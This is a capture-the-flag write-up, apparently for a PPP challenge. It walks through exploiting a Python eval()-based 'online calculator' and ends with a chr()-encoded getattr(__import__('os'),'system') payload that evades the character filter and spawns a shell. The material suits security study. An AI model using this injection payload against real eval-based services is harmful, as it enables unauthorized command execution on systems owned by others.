So, this is one of the easier challenges, we were given a some connection information, and here's the information it gave us upon connection:
Welcome to the online calculator. Please enter your expression below.
1
About to Calculate:
Calculating: 1
Equals: 1
At this point, we don't know much, except that it does some sort of calculation. A few more trials, and we've learned some useful information:
Welcome to the online calculator. Please enter your expression below.
1+1
About to Calculate:
Calculating: 1+1
Equals: 2
Welcome to the online calculator. Please enter your expression below.
2**200
About to Calculate:
Calculating: 2**200
Equals: 1606938044258990275541962092341162602522202993782792835301376
Welcome to the online calculator. Please enter your expression below.
2.5*2
About to Calculate:
Invalid Character: .
Please enter a mathematical operation
We've now gained some useful information. The first of those shows that its using some sort of eval or exec. The second one shows that we're probably using python, judging by the fact that that both ** and that it can keep track of that big of a number. Finally, we've discovered that at least some characters are being filtered, which probably is going to make things difficult.
Its now time to break out the Python knowledge, and start poking around.
Welcome to the online calculator. Please enter your expression below.
locals()
About to Calculate:
Calculating: locals()
Equals: {'s': 'locals()'}
Welcome to the online calculator. Please enter your expression below.
globals()
About to Calculate:
Calculating: globals()
Equals: {'__builtins__': , '__file__': 'calcula
tor.py', 'brokenSanitizeString': , '__package__': None, '__name__': '__main__', 'main': , '__doc__': None, 'calculator': }
Welcome to the online calculator. Please enter your expression below.
s
About to Calculate:
Calculating: s
Equals: s
Welcome to the online calculator. Please enter your expression below.
s test test test
About to Calculate:
Calculating: s test test test
Equals: Please enter a mathematical operation
There's a few important notes here. First, we found that there is only one object defined, s. Likewise, there are a couple global functions: brokenSanitizeString(), calculator(), and main(). Finally, lets find out what's in that s object. Turns out that its the input that we give to the function. Note the last result, we get the output from s, but still get the error from the fact that test is not defined.
Welcome to the online calculator. Please enter your expression below.
main(),main()
About to Calculate:
Calculating: main(),main()
Equals: Welcome to the online calculator. Please enter your expression below.
1+1
About to Calculate:
Calculating: 1+1
Equals: 2
Welcome to the online calculator. Please enter your expression below.
2+2
About to Calculate:
Calculating: 2+2
Equals: 4
(None, None)
We've now find an important trick. By calling main(), we get another opportunity to input more data.
Now, we know everything needed to get some exploiting going on. First, we'll be using what may be a lesser known function, __import__. Some experimentation shows that the program is using eval() on our input, which means we can only use functions, so tricks like `/bin/sh` aren't going to work. Instead, what we're going to do is getattr(__import__('os'), 'system')('/bin/sh'). By converting that entire string to ASCII values, combining them into one nice string, and letting the calculator, we get...
Welcome to the online calculator. Please enter your expression below.
getattr(eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)+chr(111)+chr(114)
+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)+chr(115)+chr(39)
+chr(41)),chr(115)+chr(121)+chr(115)+chr(116)+chr(101)+chr(109))
(chr(99)+chr(109)+chr(100))
About to Calculate:
Calculating: getattr(eval(chr(95)+chr(95)+chr(105)+chr(109)+chr(112)
+chr(111)+chr(114)+chr(116)+chr(95)+chr(95)+chr(40)+chr(39)+chr(111)
+chr(115)+chr(39)+chr(41)),chr(115)+chr(121)+chr(115)+chr(116)+chr(101)
+chr(109))(chr(99)+chr(109)+chr(100))
Equals:Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
Yes, I'm using Windows, so I called cmd instead, but its all good.
Also, I've been informed that this challenge is a little on the difficult side to find, so I've hosted it here: http://www.theskolor.net/ctfs/calculator.zip. If one of the PPP guys has an issue with this, just let me know and I'll take it down.